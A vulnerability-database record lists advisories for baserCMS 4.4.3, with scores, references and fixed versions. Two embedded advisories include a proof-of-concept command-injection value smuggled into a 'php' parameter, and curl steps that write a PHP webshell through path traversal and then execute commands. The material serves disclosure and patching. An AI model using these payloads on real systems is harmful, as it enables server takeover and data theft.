Lookup for vulnerable packages by Package URL.

Purl pkg:composer/baserproject/basercms@4.4.3
Type composer
Namespace baserproject
Name basercms
Version 4.4.3
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 5.2.3
Latest_non_vulnerable_version 5.2.3
Affected_by_vulnerabilities
0
url VCID-1q79-sxzp-zker
vulnerability_id VCID-1q79-sxzp-zker
summary
OS Command Injection
baserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
reference_id
reference_type
scores
0
value 0.02357
scoring_system epss
scoring_elements 0.8521
published_at 2026-06-04T12:55:00Z
1
value 0.02357
scoring_system epss
scoring_elements 0.85235
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20682
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
reference_id CVE-2021-20682
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20682
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20682, GHSA-g39q-f4rm-85x4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker
1
url VCID-3new-f12y-8bf9
vulnerability_id VCID-3new-f12y-8bf9
summary
baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)
### Details
The application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure `require_once`

### PoC
1. Restore backup
   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)
1. Load file shell (insecure `require_once`)
   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)
   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)

### Impact
Remote Code Execution (RCE)
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09459
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-32957
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-32957
6
reference_url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
reference_id GHSA-hv78-cwp4-8r7r
reference_type
scores
url https://github.com/advisories/GHSA-hv78-cwp4-8r7r
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2025-32957, GHSA-hv78-cwp4-8r7r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9
2
url VCID-4zw8-truk-pugf
vulnerability_id VCID-4zw8-truk-pugf
summary
baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)
## Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.

---

## Vulnerability Information

| Item | Details |
| ---- | ------- |
| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
| Impact | Remote Code Execution (RCE) |
| Severity | Critical |
| Attack Requirements | Administrator privileges required |
| Reproducibility | Reproducible (confirmed multiple times) |
| Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

## Affected Areas

- **Controller**
  - `PluginsController::get_core_update()`
- **Service**
  - `PluginsService::getCoreUpdate()`
- **Affected Endpoint**
  - `/baser/admin/baser-core/plugins/get_core_update`

---

## Technical Details

### Vulnerable Code Flow

```text
PluginsController::get_core_update()
  ↓ Retrieves php parameter from POST data
PluginsService::getCoreUpdate($targetVersion, $php, $force)
  ↓ Concatenates $php into command string without validation or escaping
exec($command)
```

### Relevant Code (Excerpt)

**PluginsController.php**

```php
$service->getCoreUpdate(
    $request->getData('targetVersion') ?? '',
    $request->getData('php') ?? 'php',
    $request->getData('force'),
);
```

**PluginsService.php**

```php
$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .
           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);
```

The `$php` parameter is user input, and **none** of the following countermeasures are in place:

- Restriction via allowlist
- Validation via regular expression
- Escaping via `escapeshellarg()` or similar

---

## Attack Scenario

1. The attacker logs in as a CMS administrator
2. Sends a POST request to the core update functionality in the admin panel
3. Specifies a string containing OS commands in the `php` parameter
4. `exec()` is executed on the server side, running the arbitrary OS command

### Example Attack Input (Conceptual)

```text
php=php;id>/tmp/rce_test;#
```

---

## Verification Results (PoC)

### Execution Result

```bash
$ docker exec bc-php cat /tmp/rce_test
uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)
```

The above confirms that OS commands can be executed with `www-data` privileges.

### Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser)
- Succeeds even with CSRF/FormProtection tokens included in a legitimate request
- Failure cases (400/403) have also been investigated and differentiated
- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

## Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information
- Reading/writing arbitrary files
- Retrieval of application configuration information (DB credentials, etc.)
- OS-level operations beyond application permission boundaries

Although administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.

---

## Recommended Fix

### Primary Recommendation

- Do not accept the PHP executable path from user input
- Fix the PHP executable on the server side using the `PHP_BINARY` constant

```php
$php = escapeshellarg(PHP_BINARY);
```

### Supplementary Fix Recommendations

- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well
- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

### Alternative (Not Recommended)

- Allowlist validation for the PHP executable path
- Combined use of regex validation and `escapeshellarg()`

However, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.

---

## Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons)
- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed
- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

## Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
reference_id
reference_type
scores
0
value 0.00131
scoring_system epss
scoring_elements 0.32198
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21861
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21861
6
reference_url https://github.com/advisories/GHSA-qxmc-6f24-g86g
reference_id GHSA-qxmc-6f24-g86g
reference_type
scores
url https://github.com/advisories/GHSA-qxmc-6f24-g86g
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-21861, GHSA-qxmc-6f24-g86g
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf
3
url VCID-5ay3-1t5g-vycu
vulnerability_id VCID-5ay3-1t5g-vycu
summary
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
reference_id
reference_type
scores
0
value 0.00438
scoring_system epss
scoring_elements 0.6349
published_at 2026-06-05T12:55:00Z
1
value 0.00438
scoring_system epss
scoring_elements 0.63447
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41279
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
reference_id CVE-2021-41279
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41279
4
reference_url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4x2f-54wr-4hjg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
reference_id GHSA-4x2f-54wr-4hjg
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41279, GHSA-4x2f-54wr-4hjg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu
4
url VCID-7x3n-4c2b-nfbx
vulnerability_id VCID-7x3n-4c2b-nfbx
summary
baserCMS has OS command injection vulnerability in installer
baserCMS has an OS command injection vulnerability in the installer.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_54513170

### Credits

REN XINGDIAN
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
reference_id
reference_type
scores
0
value 0.00055
scoring_system epss
scoring_elements 0.17526
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30880
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
reference_id
reference_type
scores
0
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30880
6
reference_url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
reference_id GHSA-6hpg-8rx3-cwgv
reference_type
scores
url https://github.com/advisories/GHSA-6hpg-8rx3-cwgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30880, GHSA-6hpg-8rx3-cwgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx
5
url VCID-891u-x525-ykbb
vulnerability_id VCID-891u-x525-ykbb
summary
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
There is a potential Zip Slip vulnerability and OS command injection vulnerability in the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
reference_id
reference_type
scores
0
value 0.02799
scoring_system epss
scoring_elements 0.86405
published_at 2026-06-05T12:55:00Z
1
value 0.02799
scoring_system epss
scoring_elements 0.86382
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-41243
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
reference_id CVE-2021-41243
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-41243
4
reference_url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rpc-9m88-cf9w
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
reference_id GHSA-7rpc-9m88-cf9w
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.4
purl pkg:composer/baserproject/basercms@4.5.4
is_vulnerable true
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4
aliases CVE-2021-41243, GHSA-7rpc-9m88-cf9w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb
6
url VCID-8buz-nsr9-3yge
vulnerability_id VCID-8buz-nsr9-3yge
summary
baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API
## Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.

An authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

## Affected Code

**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`

```php
public function getFullpath(string $theme, string $plugin, string $type, string $path)
{
    // ...
    return $viewPath . $type . DS . $path;  // $path is not sanitized
}
```

## Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.)
2. Obtains an access token via API login
3. Specifies `path: "../../../../webroot/"` in the theme file creation API
4. A PHP file is created in the webroot
5. The attacker accesses the created PHP file to achieve RCE

## Reproduction Steps

```bash
# 1. Login
curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@example.com","password":"password"}'

# 2. Create webshell
curl -X POST "http://target/baser/api/admin/bc-theme-file/theme_files/add.json" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{
    "theme": "BcThemeSample",
    "plugin": "",
    "type": "layout",
    "path": "../../../../webroot/",
    "base_name": "shell",
    "ext": "php",
    "contents": "<?php system($_GET[\"cmd\"]); ?>"
  }'

# 3. RCE
curl "http://target/shell.php?cmd=id"
```

## Vulnerability Details

| Item | Details |
|------|---------|
| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |
| Impact | Arbitrary file write, Remote Code Execution (RCE) |
| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |
| Reproducibility | High (PoC verified) |
| Test Environment | baserCMS 5.x (Docker environment) |

### Additional Notes on Attack Prerequisites

- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.
- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

## Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

## Comparison with Other CMS

WordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. [CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

## Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
7
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS.

Please refer to the following page for more information.
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
